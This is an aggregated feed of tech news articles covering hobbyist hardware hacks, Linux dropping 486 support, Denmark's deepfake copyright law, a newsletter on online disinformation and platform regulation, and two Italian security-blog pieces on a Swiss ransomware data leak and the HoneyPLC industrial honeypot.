[Bogdan Micea] uses a laptop cooler, but was a bit annoyed that his cooler would run at the same power no matter how hard the laptop was working. Rather than keep adjusting the cooler’s power manually, he automated it by installing an Arduino Pro Micro as a controller in the cooler and writing a Rust controller application for his computer.
[Bogdan]’s cooler is controlled by four buttons, which can have different functions depending on how long they’re pressed. After mapping out their functionality and minor quirks, [Bogdan] soldered four transistors in parallel with the buttons to let the Arduino simulate button presses; another four Arduino pins accept input from the buttons to monitor their state. The Arduino USB port connects to the cooler’s original USB power input, so the cooler looks superficially unchanged. When the cooler starts up, the Arduino sets it to a known state, then monitors the buttons. Since it can both monitor and control the buttons, it can notify the computer when the cooler’s state changes, or change the state when the computer sends a command.
On the computer’s part, the control software creates a system tray that displays and allows the user to change the cooler’s current activity. The control program can detect the CPU’s temperature and adjust the cooler’s power automatically, and the Arduino can detect the laptop’s suspend state and control power accordingly.
Somewhat surprisingly, this seems to be the first laptop cooler we’ve seen modified. We have seen a laptop cooler used to overclock a Teensy, though, and a laptop’s stock fans modified.
Why The Latest Linux Kernel Won’t Run On Your 486 And 586 Anymore
Some time ago, Linus Torvalds made a throwaway comment that sent ripples through the Linux world. Was it perhaps time to abandon support for the now-ancient Intel 486? Developers had already abandoned the 386 in 2012, and Torvalds openly mused if the time was right to make further cuts for the benefit of modernity.
It would take three long years, but that eventuality finally came to pass. As of version 6.15, the Linux kernel will no longer support chips running the 80486 architecture, along with a gaggle of early “586” chips as well. It’s all down to some housekeeping and precise technical changes that will make the new code inoperable with the machines of the past.
Why Won’t It Work Anymore?
The kernel has had a method to emulate the CMPXCH8B instruction for some time, but it will now be deprecated.
The big change is coming about thanks to a patch submitted by Ingo Molnar, a long time developer on the Linux kernel. The patch slashes support for older pre-Pentium CPUs, including the Intel 486 and a wide swathe of third-party chips that fell in between the 486 and Pentium generations when it came to low-level feature support.
Going forward, Molnar’s patch reconfigures the kernel to require CPUs have hardware support for the Time Stamp Counter (RDTSC) and CMPXCHG8B instructions. These became part of x86 when Intel introduced the very first Pentium processors to the market in the early 1990s. The Time Stamp Counter is relatively easy to understand—a simple 64-bit register that stores the number of cycles executed by the CPU since last reset. As for CMPXCHG8B, it’s used for comparing and exchanging eight bytes of data at a time. Earlier Intel CPUs got by with only the single-byte CMPXCHG instruction. The Linux kernel used to feature a piece of code to emulate CMPXCHG8B in order to ease interoperability with older chips that lacked the feature in hardware.
The changes remove around 15,000 lines of code. Deletions include code to emulate the CMPXCHG8B instruction for older processors that lacked the instruction, various emulated math routines, along with configuration code that configured the kernel properly for older lower-feature CPUs.
Basically, if you try to run Linux kernel 6.15 on a 486 going forward, it’s just not going to work. The kernel will make calls to instructions that the chip has never heard of, and everything will fall over. The same will be true for machines running various non-Pentium “586” chips, like the AMD 5×86 and Cyrix 5×86, as well as the AMD Elan. It’s likely even some later chips, like the Cyrix 6×86, might not work, given their questionable or non-existent support of the CMPXCHG8B instruction.
Why Now?
Molnar’s reasoning for the move was straightforward, as explained in the patch notes:
In the x86 architecture we have various complicated hardware emulation
facilities on x86-32 to support ancient 32-bit CPUs that very very few
people are using with modern kernels. This compatibility glue is sometimes
even causing problems that people spend time to resolve, which time could
be spent on other things.
Indeed, it follows on from earlier comments by Torvalds, who had noted how development was being held back by support for the ancient members of Intel’s x86 architecture. In particular, the Linux creator questioned whether modern kernels were even widely compatible with older 486 CPUs, given that various low-level features of the kernel had already begun to implement the use of instructions like RDTSC that weren’t present on pre-Pentium processors. “Our non-Pentium support is ACTIVELY BUGGY AND BROKEN right now,” Torvalds exclaimed in 2022. “This is not some theoretical issue, but very much a ‘look, ma, this has never been tested, and cannot actually work’ issue, that nobody has ever noticed because nobody really cares.”Intel kept i486 chips in production for a good 18 years, with the last examples shipped out in September 2007. Credit: Konstantin Lanzet, CC BY-SA 3.0
Basically, the user base for modern kernels on old 486 and early “586” hardware was so small that Torvalds no longer believed anyone was even checking whether up-to-date Linux even worked on those platforms anymore. Thus, any further development effort to quash bugs and keep these platforms supported was unjustified.
It’s worth acknowledging that Intel made its last shipments of i486 chips on September 28, 2007. That’s perhaps more recent than you might think for a chip that was launched in 1989. However, these chips weren’t for mainstream use. Beyond the early 1990s, the 486 was dead for desktop users, with an IBM spokesperson calling the 486 an “ancient chip” and a “dinosaur” in 1996. Intel’s production continued on beyond that point almost solely for the benefit of military, medical, industrial and other embedded users.Third-party chips like the AMD Elan will no longer be usable, either. Credit: Phiarc, CC-BY-SA 4.0
If there was a large and vocal community calling for ongoing support for these older processors, the kernel development team might have seen things differently. However, in the month or so that the kernel patch has been public, no such furore has erupted. Indeed, there’s nothing stopping these older machines still running Linux—they just won’t be able to run the most up-to-date kernels. That’s not such a big deal.
While there are usually security implications around running outdated operating systems, the simple fact is that few to no important 486 systems should really be connected to the Internet anyway. They lack the performance to even load things like modern websites, and have little spare overhead to run antiviral software or firewalls on top of whatever software is required for their main duties. Operators of such machines won’t be missing much by being stuck on earlier revisions of the kernel.
Ultimately, it’s good to see Linux developers continuing to prune the chaff and improve the kernel for the future. It’s perhaps sad to say goodbye to the 486 and the gaggle of weird almost-Pentiums from other manufacturers, but if we’re honest, few to none were running the most recent Linux kernel anyway. Onwards and upwards!
Finally, An Extension To Copyright Law We Can Get Behind
Normally when a government extends a piece of copyright law we expect it to be in the favour of commercial interests with deep pockets and little care for their consumers. But in Denmark they do things differently it seems, which is why they are giving Danes the copyright over their own features such as their faces or voices. Why? To combat deepfakes, meaning that if you deepfake a Dane, they can come after you for big bucks, or indeed kronor. It’s a major win, in privacy terms.
You might of course ask, whether it’s now risky to photograph a Dane. We are not of course lawyers here but like any journalists we have to possess a knowledge of how copyright works, and we are guessing that the idea in play here is that of passing off. If you take a photograph of a Volkswagen you will have captured the VW logo on its front, but the car company will not sue you because you are not passing off something that’s not a Volkswagen as the real thing. So it will be with Danes; if you take a picture of their now-copyrighted face in a crowd you are not passing it off as anything but a real picture of them, so we think you should be safe.
We welcome this move, and wish other countries would follow suit.
Pope Francis, Midjourney, Public domain, (Which is a copyright story all of its own!)
The Fake News Factory
KIA ORA. IT'S WEDNESDAY, AND THIS IS DIGITAL POLITICS. I'm Mark Scott, and this week's edition comes to you from New Zealand. I'm taking a couple weeks off, so the next newsletter (for paying subscribers) will hit inboxes on July 14.
I'm trying something different this week.
Ahead of the 2024 global megacycle of elections, I had the idea of explaining the links between the digital tactics that have now become all too common in how politicians get elected from Pakistan and Portugal to the United Kingdom and the United States.
Life, however, got in the way. (The best I did was this package around artificial intelligence, disinformation and elections.) So, I'm taking another crack at how we all now live in the Fake News Factory.
Let's get started:
The democratization of online tools and tactics
THE LAST DECADE REPRESENTED the second generation of social media. It was an era where the shine had significantly come off Facebook and Twitter (now X.) It was a time of repeated whistleblower reports about tech giants understanding how their content algorithms were pushing people toward polarizing and extremist content. It was a time of serious commercialization of these platforms by politicians eager to bombard would-be voters with billions of dollars of collective ad buys.
That era is now over. It's not that Facebook and YouTube are no longer important. They are — especially YouTube which has transformed itself into a global rival for traditional television in a way that has upended the advertising industry and fundamentally reshaped how anyone under 30-years old consumes video content. But where the 2015-2025 period was primarily defined by the dominance of a small number of Silicon Valley platforms, we're now in an era where fringe platforms, niche podcasts and the likes of vertical dramas have divided people into small online communities that rarely interact with each other.
This was happening before 2025. But we have reached an inflection point in how the online information ecosystem works. It has now shattered into a million pieces where people gravitate to like-minded individuals in siloed platforms. There is no longer a collective set of facts or events that form the foundation for society. Instead, most of us seek out opinions that already reflect our worldview, often demonizing those who we disagree with in an "othering" that only fuels polarization, misunderstanding and, potentially, offline harm.
And you thought this would be an uplifting newsletter.
Thanks for reading the free monthly version of Digital Politics. Paid subscribers receive at least one newsletter a week. If that sounds like your jam, please sign up here.
Here's what paid subscribers read in June:
— Debunking popular misconceptions around platform governance; The demise of the open, interoperable internet is upon us; How oversight over AI has drastically slowed since 2023. More here.
— Internal fighting among Big Tech giants has hobbled any pushback against antitrust enforcement; It's time to rethink our approach to tackling foreign interference; Tracking Europe's decade-long push to combat online disinformation. More here.
— Why the G7 has always been a nothing-burger on tech policy; You should keep an eye out on 'digital public infrastructure' in the battle around tech sovereignty; the United Kingdom's expanding online safety investigations. More here.
— The US is sending seriously mixed messages about its approach to tech policy; How the UK became the second place in the world to mandate social media data access; Artificial intelligence will upend how we consume news online. More here.
This bifurcation in how people consume online content has made it next to impossible for foreign interference operations to flourish like they once did. See, there's a positive point. Even two years ago, the Russians could flood the zone with Kremlin talking points and receive a significant bump in online interactions. The Chinese never went in for that sort of thing — though have progressively targeted Western audiences mostly with overt propaganda in support of the Chinese Communist Party.
Now, such efforts are almost certainly doomed to fail. The siloing of social media usage has been married with a need for authenticity — that sense of belonging and insider knowledge that can only come from deep roots in communities that can smell out an imposter from a mile off. That authenticity is something that foreign (covert) campaigns routinely do badly at. State-backed operations don't know the insider lingo; they don't have the long-standing credibility built up over months/years; and they don't have personal ties required to fully embed in the balkanization of social media.
But where state-backed actors remain a threat is in the amplification of existing domestic influencers often by automated bot-nets and other AI-powered tools aimed at juicing social media giants' recommender systems. The companies say they are on top of these covert tactics. But every time there's a massive global political event (or local election), Kremlin-backed narratives keep popping up in people's feeds — often via local influencers whose views just happen to align with Moscow. These individuals are mostly not connected with Russia. But they have likely received a boost from Kremlin-aligned groups seeking to spread those messages to the widest audience possible.
It's about domestic, not foreign
IN TRUTH, STATE-BACKED ACTORS are a very public sideshow to the main event driving ongoing toxicity within the information environment: domestic actors. Be they influencers, scammers, politically-aligned media or, ahem, politicians, they are the key instigator for much of the current. Many of these domestic players see some form of benefit from spreading harm, falsehoods and, in some cases, illegality online. That, it should be added, is then amplified by social media platforms' algorithms that have been programmed to entice people to stay on these networks, often by promoting the most divisive content as possible.
Such a dynamic has been around for years. It isn't a left- or right-wing issue — though repeated studies have shown that conservative social media users promote more falsehoods than their liberal counterparts. It's a basic fact that domestic social media users both know their audience better than foreign influence campaigns and that they have greater credibility with siloed local audiences than Russia, China or Iran.
What has shifted, though, is the ability for almost anyone to run a domestic influence campaign — or, you know, a mainstream political campaign — as if they had the resources of the Kremlin-backed Internet Research Agency. Over the last five years, the toolkit required to skew social media has become readily accessible and significantly cheaper than it once was. That has been spurred on even more through the rapid growth of AI-enabled tools (more on that below.) But everything from a Bangladesh-based bot farm to a Philippines-based dark arts public relations has now become an off-the-shelf product that can be bought via a few clicks on a public-facing website.
This shift has not gone unnoticed by criminals. In 2025, the highest volume of attacks in the (Western) information environment now come from those seeking to dupe social media users out of money — and not to alter their political allegiances. Yes, the impact on politics can have significantly bigger effects. But the rise of "financial disinformation" in terms of frauds and scams promoted on social media has reached pandemic proportions.
Collectively, such digital efforts to swindle people out of money now costs billions of dollars a year, and even that is likely a significant underestimate. It's also directly linked to a crime (aka fraud) when scammers buy social media adverts to convince people to sign up to Ponzi and other get-rich-quick schemes. I did a quick search, via Meta's ad library in six different countries, for such financial scams, and found a prolific amount of advertising that promoted such disinformation. Some of it was blatantly illegal, some of it was not (I'm not linking to it to avoid amplification.) But the fact such scam artists are openly flaunting the law should be a worry for us all.
This democratization of disinformation has only gone from bad to worse with AI tools. Be it cloning technology to spoof a victim's voice, AI-generated images attacking a political opponent or next-generation video software that creates falsehoods from scratch within minutes, the cost for generating toxicity, hate and polarization is now almost zero. Yes, these tools can also generate joy, laughter and entertainment. But the last six months have seen a rapid rise in AI-generated slop that is quickly moving from being easy to detect to being indistinguishable from the real thing.
Trust me, I'm a regulator
THIS YEAR MARKS THE FIRST TIME ON RECORD that several countries' online safety rulebooks are in full operation. Yes, Australia got things started almost five years ago. But with the European Union's Digital Services Act and the UK's Online Safety Act, the Western world has the first signs of what a well-resourced regulatory environment looks like when it comes to keeping people safe online.
Sigh.
It's not that the European Commission and Ofcom (disclaimer: I sit on an independent advisory committee at the British regulator, so anything I say here is done so in a personal capacity) aren't doing their best. They are. It's just both are fighting a 2020 war against perceived threats within the online information environment, and just haven't kept pace with the fast-evolving tactics, some of which I outlined above.
To a degree, the time lag is understandable. Regulators are always going to be behind the curve on the latest threats. Both agencies are still staffing up and learning the ropes of their new rulebooks. How successful either the EU or UK will be in making their online worlds safer for citizens won't be known for at least five years, at the earliest.
But there have been some serious mistakes, especially from the European Commission. Let's leave aside the political nature of the first investigations under the Digital Services Act. And let's leave aside the internal bureaucratic infighting that was always going to arise from such a powerful — and well-resourced — piece of legislation.
For me, the biggest error was how Ursula von der Leyen framed the new rules as almost exclusively a means for combatting Russian interference. That was done primarily to secure her second tenure as European Commission president. But the characterization of the Digital Services Act as an all-powerful mechanism to thwart the Kremlin's covert influence operations has continued well into this year — most notably in the two presidential elections in Romania.
Sign up for Digital Politics
Thanks for getting this far. Enjoyed what you've read? Why not receive weekly updates on how the worlds of technology and politics are colliding like never before. The first two weeks of any paid subscription are free.
Subscribe
Email sent! Check your inbox to complete your signup.
No spam. Unsubscribe anytime.
Let's be clear. These online safety rules are many things. But, at their heart, they are wonky, bureaucratic and cumbersome mandatory requirements for platforms to abide by their own internal policies against illegal content. They are not about Russian disinformation. And they certainly are not about censorship.
Weaponization and unknown unknowns
And that takes me to the final big concern within the Fake News Factory: the weaponization of online safety rules. Since 2016, there have been those within the US that pushed back hard against platforms' efforts to quell illegal and abusive content. That has spiralled into conspiratorial claims that a Censorship Industrial Complex — made up of governments, social media giants and outsiders — is trying to illegally silence predominantly rightwing voices, often via new online safety legislation.
US President Donald Trump's administration has made it clear what it thinks of these rules — and has pushed back hard. It has threatened retaliatory tariffs against countries with online safety rules on the books. It has threatened to ban anyone who allegedly tries to censor Americans from entering the country. It has accused both the UK and EU of infringing on US First Amendment rights.
These attacks against what are, essentially, legal commitments obligating companies to live by their own internal rules — and to demonstrate that they have done so — are now part of the conversation in other Western countries. That includes (mostly) right-wing lawmakers across Europe seeking to weaken these online safety rules, accusing others of censoring conservative viewpoints and mimicking many of the long-standing talking points from their US counterparts.
It's true, particularly during the pandemic, that social media companies made content moderation decisions with imperfect facts. Some posts were unfairly removed or downranked as these firms responded, in real time, to government efforts to amplify scientifically correct information. But the rise of conspiracy theories, which insinuated a mass censoring of online voices, just didn't bear out with the evidence at hand. And that came after repeated reports from the US House of Representatives select subcommittee on the weaponization of the federal government.
If there was evidence of such abuse, then I would be the first to champion such findings. But as we enter the second half of the year, there is one core underlying fact that underpins everything I've written so far: no one has a clue about what happens on these platforms.
Long-time Digital Politics readers will have heard mego on about this for months — and, to be fair, it's part of my day job to look into this issue. But how the complex recommender system algorithms interact with people's individual posts, paid-for advertising and wider efforts to influence people online remains a black box. What I have outlined above, for instance, is based on my own research, what I understand anecdotally about how these platforms work and discussions with policymakers, tech executives and other experts.
The Fake News Factory is my own imagining of how the current online information ecosystem interacts and shapes the world around us. But without better awareness — via mandatory requirements that these firms open up to independent scrutiny, transparency and accountability — about the inner workings of these platforms, that imagining will remain incomplete, at best.
We are entering a new generation of social media with limited awareness, mass balkanization and an increasingly politicization of what should be clear objectives of keeping everyone safe online. How long this era will stick around for is anyone's guess. But, for now, the Fake News Factory remains as strong as ever.
What I'm reading
— The Organization for Economic Cooperation and Development analyzed the so-called age assurance policies from 50 online services — most of which did not have checks in place. More here.
— The team at the DSA Observatory did a deep dive into how individuals, non-profit organizations and consumer groups can bring private enforcement actions under the EU's Digital Services Act.
— The UK's Competition and Markets Authority laid out its rationale for why it had designated Google a so-called "strategic market status" under the country's new digital antitrust rules. More here.
— OpenAI submitted recommendations to the upcoming US AI Action Plan. The words "freedom" and "PRC" are mentioned repeatedly throughout. More here.
— Researchers at USC Annenberg looked at how the media covered the negative side of social media/technology, and found that the companies are rarely blamed. More here.
Adding Automatic Emergency Braking To An RC Car
Modern RC cars can be pretty darn fast. That’s fun and all, but it also makes it easy to crash them into things. This problem inspired [Narrow Studios] to whip up something to offer a bit of protection.
The concept is simple enough—the RC car just needs some way to detect obstacles and stop before hitting them. The build relies on ultrasonic sensors as rangefinders to spot solid objects in the path of the vehicle. An Arduino Nano is in charge of reading the sensors. When it appears the car is approaching a wall or similar obstacle, it fires off a PWM signal to the car’s motor controller commanding it to brake. The additional hardware is held to the car with a bunch of custom printed brackets.
The setup isn’t perfect; the video notes that if you insist on accelerating quickly when close to a wall, you still have a fair chance of hitting it. That’s largely put down to the refresh time of the sensors and the overall system, which could be improved with further work. Still, if you’re always crashing your RC car into walls or curbs, this kind of thing might appeal to you.
We’ve featured some other great RC projects before, too.
youtube.com/embed/ht6-LsJQgek?…
Attacco ransomware a Radix: i dati governo svizzero finiscono nelle underground
Il governo svizzero ha annunciato che un attacco ransomware ai danni di un’organizzazione terza chiamata Radix ha causato la fuga di informazioni riservate da diverse agenzie federali. Secondo le autorità, gli aggressori hanno rubato dati dai sistemi Radix (che sono stati poi crittografati) e poi hanno pubblicato le informazioni sul dark web. Il National Cyber Security Centre (NCSC) del Paese sta attualmente analizzando i dati rubati per determinare quali agenzie governative siano state colpite.
Radix è un’organizzazione senza scopo di lucro con sede a Zurigo che promuove la salute e stili di vita sani. Gestisce otto centri di competenza che realizzano diversi progetti e servizi per conto della Confederazione, di autorità cantonali e comunali, nonché di altre organizzazioni pubbliche e private. L’organizzazione ha già rilasciato una dichiarazione ufficiale sull’attacco, affermando che il 16 giugno 2025 i suoi sistemi sono stati compromessi dagli operatori del ransomware Sarcoma.
I rappresentanti di Radix affermano di aver già informato tutti gli interessati tramite notifiche personalizzate e sottolineano che non ci sono prove che siano trapelati dati riservati delle organizzazioni partner. Il gruppo Sarcoma ha iniziato le sue attività nell’ottobre 2024 ed è rapidamente diventato uno dei più attivi nel panorama dei ransomware, con 36 aziende vittime solo nel primo mese. Uno degli attacchi più noti di Sarcoma è stato l’attacco hacker al produttore taiwanese di circuiti stampati Unimicron.
Gli aggressori hanno pubblicato i dati rubati da Radix sul loro sito di fuga di notizie darknet il 29 giugno 2025, il che indica probabilmente che i tentativi di riscatto non hanno avuto successo. Gli hacker hanno rilasciato gratuitamente un archivio da 1,3 TB contenente documenti scansionati, dati finanziari, contratti e messaggi.
Per ridurre i rischi, i rappresentanti di Radix raccomandano alle vittime di restare vigili nei prossimi mesi e di diffidare dei tentativi di phishing che potrebbero essere mirati a ottenere password, numeri di carte di credito e informazioni sull’account.
È importante sottolineare che questa è la seconda volta che un ransomware ruba dati da appaltatori del governo svizzero. Nel 2023, gli autori del ransomware Play hanno hackerato l’azienda informatica Xplain , che fornisce soluzioni tecnologiche e software a vari dipartimenti governativi, unità amministrative e persino alle forze armate del Paese. Di conseguenza, sono trapelati 6.500 file riservati del governo federale .
L'articolo Attacco ransomware a Radix: i dati governo svizzero finiscono nelle underground proviene da il blog della sicurezza informatica.
HoneyPLC: il nuovo honeypot che rivoluziona la difesa degli impianti industriali
I sistemi di controllo industriale (ICS), fondamentali per il funzionamento di infrastrutture critiche come reti elettriche, idriche e di trasporto, sono sempre più vulnerabili agli attacchi informatici. In questo contesto, l’articoloHoneyPLC: un honeypot di nuova generazione per i sistemi di controllo industriale propone un honeypot avanzato e scalabile progettato per simulare PLC reali (controllori logici programmabili) e raccogliere in maniera automatica malware, in particolare codice dannoso scritto in ladder logic, migliorando sensibilmente lo stato dell’arte nella protezione degli ICS.
A differenza degli honeypot tradizionali, HoneyPLC si distingue per tre aspetti fondamentali: elevata interattività, ampia scalabilità e capacità di inganno. È in grado di emulare fedelmente protocolli di rete industriali come TCP/IP, S7comm, SNMP e HTTP, offrendo un’interazione simile a quella di un vero PLC.
Può inoltre simulare più modelli di PLC provenienti da marchi diversi, rendendolo molto più adattabile rispetto agli honeypot precedenti, che di solito supportano solo uno o due modelli. La sua struttura modulare consente anche di creare profili personalizzati per diversi dispositivi industriali.
Uno degli aspetti più innovativi è la capacità di occultamento: HoneyPLC riesce a ingannare gli strumenti di ricognizione più comuni, come Nmap, fornendo risposte verosimili grazie alla generazione automatica di fingerprint e all’emulazione accurata dei protocolli. Inoltre, ogni interazione dell’attaccante viene tracciata e conservata nei log, con la possibilità di raccogliere in tempo reale i programmi in logica ladder iniettati nei blocchi di memoria, funzione che mancava nei precedenti honeypot ICS.
La valutazione sperimentale ha coinvolto cinque modelli di PLC reali (tra cui Siemens, Allen-Bradley e ABB) e ha dimostrato che HoneyPLC è in grado di replicare fedelmente il comportamento di ciascuno di essi. È riuscito anche a resistere alle scansioni di strumenti di ricognizione, simulando stack di rete coerenti con i dispositivi target. Inoltre, ha catturato efficacemente malware scritto in ladder logic, confermando la sua utilità come strumento di raccolta e analisi dei codici malevoli.
In conclusione, HoneyPLC rappresenta un importante passo avanti nella protezione dei sistemi industriali. Grazie alla sua capacità di scalare su più modelli di PLC, di simulare interazioni realistiche e di raccogliere malware in maniera automatizzata, costituisce un potente strumento per la ricerca sulla sicurezza degli ICS e per la creazione di contromisure sempre più efficaci contro le minacce informatiche rivolte al settore industriale.
L'articolo HoneyPLC: il nuovo honeypot che rivoluziona la difesa degli impianti industriali proviene da il blog della sicurezza informatica.
Whack-A-Disk
By now most floppy disks have been relegated to the dustbin of history, with a few exceptions for obscure industrial applications using legacy hardware and, of course, much of the world’s nuclear weapons arsenals. In fact, they’re so rare to see in the world anymore that many below a certain age don’t recognize the “save” symbol commonly used in application user interfaces. Without a use case, and with plenty of old floppies still laying around, [Rob] took a pile of them and built this Whack-a-Mole-style game.
The game has a number of floppy-disk-specific features compared to the arcade classic, though. First, there’s no mallet, so the player must push the floppy disks into the drive manually. Second, [Rob] went to somewhat exceptional lengths to customize the drives to that sometimes the disks jump out of the drive, forcing the player to grab them and put them back in to score points in the game. He did this without needing to install high-powered solenoids in the drives too. As for the game software itself, it all runs on an Amiga 600 and even includes a custom-made soundtrack for the 30-second game.
Getting the drives just right did take a number of prototypes, but after a few versions [Rob] has a working game that looks fun to play and is a clever use of aging hardware, not to mention the fact that it runs on a retro computer as well. Of course, for the true retro feel, you’ll want to make sure you find a CRT for the display somewhere, even though they’re getting harder to find now than old floppy disk drives.
youtube.com/embed/I2HWena_eXs?…
Challenge: Square a Voltage
Your design task, should you decide to accept it: given an input voltage, square it. Ok, that’s too hard since squaring 8 volts would give you 64 volts, so let’s say the output should be 10% of the square, so 8 volts in would result in 6.4V. How do you do it? [Engineering Prof.] knows how and will show you what you can do in the video below.
The circuit uses two op amps and some transistors. However, the transistors are used in a way that depends on the temperature, so it is important to use a transistor array so they are matched and will all be at the same temperature.
The math depends on the fact that the transistor response has a natural log term in it, and the property that the sum of two logs is the same as the log of the product of the numbers.
Because of the matching transistors, many of the terms in the equation cancel out. Because the transistors are current devices, the transistor circuit’s output current is the input current squared divided by the output transistor’s collector current. Then it is just a matter of converting the voltage to a current and back again using the right scaling.
There’s more to it, of course, but that’s the gist of it. You can dig into the math by watching the video. If the KCL references are fuzzy for you, here’s a refresher. Squaring a voltage would be pretty important for an analog computer.
youtube.com/embed/NBVIN0S5o_g?…
A Crypto Miner Takes the Straight and Narrow
As it stands, cryptocurrency largely seems to be a fad of the previous decade, at least as far as technology goes. During that time, many PC users couldn’t get reasonably priced graphics cards since most of them were going into these miners. In contrast, nowadays any shortages are because they’re being used to turn the Internet into an AI-fueled wasteland. But nonetheless, there is a lot of leftover mining hardware from the previous decade and unlike the modern AI tools getting crammed into everything we own, this dated hardware is actually still useful. [Zendrael] demonstrates this by turning an old mining rig into a media server.
The mining rig is essentially nothing more than a motherboard with a large number of PCI slots, each designed for a GPU. PCI slots can do many other things, though, so [Zendrael] puts a terabyte solid state drive in each but one of the PCI cards using NVMe to PCI adapters. The final slot still hosts a GPU since the computer is being converted to a media server, and this allows it to do various encodings server-side. Even with only 4 GB of memory, the machine in its new configuration is more than capable of running Debian and spinning up all of the necessary software needed for a modern media server like Jellyfin, Nextcloud, and Transmission.
With many people abandoning miners as the value of them declines over time, it’s possible to find a lot of hardware like this that’s ready to be put to work on something new and useful. Hopefully all of the GPUs and other hardware being put to use today in AI will find a similar useful future, but until then we’ll note that you don’t need super powerful hardware to run some of those models on your own.
youtube.com/embed/hWcVDUmKp5A?…
There Are Better Lego-Compatible Universal Joints Out There
Lego’s Technic line features all kinds of mechanical devices, from cogs to gears to chains and even pneumatic components. However, the vast majority of these components are made out of plastic and are only capable of toy-like levels of performance. In the competitive world of Lego YouTube, builders often push these parts to their limits, breaking them more often than you might think. To that end, [Brick Experiment Channel] has been investigating stouter Lego-compatible universal joints from a variety of third-party manufacturers.
The video starts with a simple demonstration, showing that a Lego universal joint pops apart at just 0.4 Nm of torque. It’s no surprise, given it relies on tiny plastic pins in snap-fit joints. However, this means that it’s not that hard to build a stronger universal joint to outperform the stock parts.
The video steps through a range of other options available on the market. For example, CaDA builds a universal joint using aluminium sleeves, a copper center, and steel pins to join everything together. It’s so strong that the plastic Lego axles fail long before the joint does. Tested with third-party aluminum axles, it eventually fails at 2.3 Nm of torque when the aluminum sleeve snaps. An all-steel joint from MTP goes even harder, eventually stripping out its axle mount at 4 Nm. The rest of the video goes on to explore angular performance, size, and other design features.
It’s fair to say that if you’re swapping out universal joints and axles for aluminum steel parts, you’re not really playing with Lego anymore. At the same time, it’s neat that there exists a sort of defacto standard kit for mechanical experimentation that is now being expanded upon with stronger components. Video after the break.
youtube.com/embed/g52QzQCOGbI?…